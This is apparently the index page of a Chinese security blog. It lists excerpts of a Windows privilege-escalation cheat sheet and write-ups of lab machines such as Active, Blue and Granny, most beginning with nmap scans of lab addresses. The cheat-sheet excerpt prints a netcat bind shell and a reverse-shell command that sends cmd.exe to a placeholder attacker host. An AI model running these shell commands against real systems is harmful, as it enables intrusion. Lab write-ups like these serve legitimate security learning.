Windows 提权 备忘录
· ☕ 8 分钟 · ✍️ IceKam
从RCE到Shell 在有限的解释器中获取shell: $ system("start cmd.exe /k $cmd") 将cmd绑定到端口: $ nc.exe -Lp 31337 -vv -e cmd.exe Reverse shell: $ nc.exe attacker_ip attacker_port -e cmd.exe 0:系统信息 查找已安装的软件
Windows
Active 练习记录
· ☕ 2 分钟 · ✍️ IceKam
环境介绍: 名称:Active 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.100 系统为Windows Server,端口53、88、135、139、
Bastion 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Bastion 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.134 系统为Windows Server,端口22、135、139、44
Access 练习记录
· ☕ 4 分钟 · ✍️ IceKam
环境介绍: 名称:Access 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80、telnet
Netmon 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Netmon 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80开放,部署有P
Bounty 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Bounty 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -A 10.10.10.93 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST Nmap scan report for 10.10.10.93 Host is up (0.34s latency).
Blue 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Blue 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ nmap -A 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 15:22 CST Nmap scan report for 10.10.10.40 Host is up (0.34s
Granny 练习记录
· ☕ 5 分钟 · ✍️ IceKam
环境介绍: 名称:Granny 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -sV -O -F -oA Granny --version-light 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST Nmap scan report for 10.10.10.15
Grandpa 练习记录
· ☕ 4 分钟 · ✍️ IceKam
环境介绍: 名称:Grandpa 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 $ nmap -sV -O -F -oA Grandpa --version-light 10.10.10.14 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:19 CST Nmap scan report for 10.10.10.14 Host is up
Arctic 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Arctic 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 $ nmap -A 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at Nmap scan report for 10.10.10.11 Host is up (0.33s latency). Not shown: 997 filtered
Devel 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Devel 信息搜集 获取目标 1 2 3 4 5 6 $ nmap -sV -O -F -oA Legacy --version-light 10.10.10.5 Nmap scan report for 10.10.10.5 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008
Bastard 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Bastard 系统:Windows 信息搜集 1 2 3 4 5 6 $ sudo nmap -sV -O -F --version-light 10.10.10.9 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open unknown -sV:探测开
Optimum 练习记录
· ☕ 4 分钟 · ✍️ IceKam
环境介绍: 名称:Devel 系统:Windows 信息搜集 1 $ sudo nmap -sV -O -F --version-light 10.10.10.8 -sV:探测开放端口以确定服务/版本信息 -O:启用OS检测 -F:快速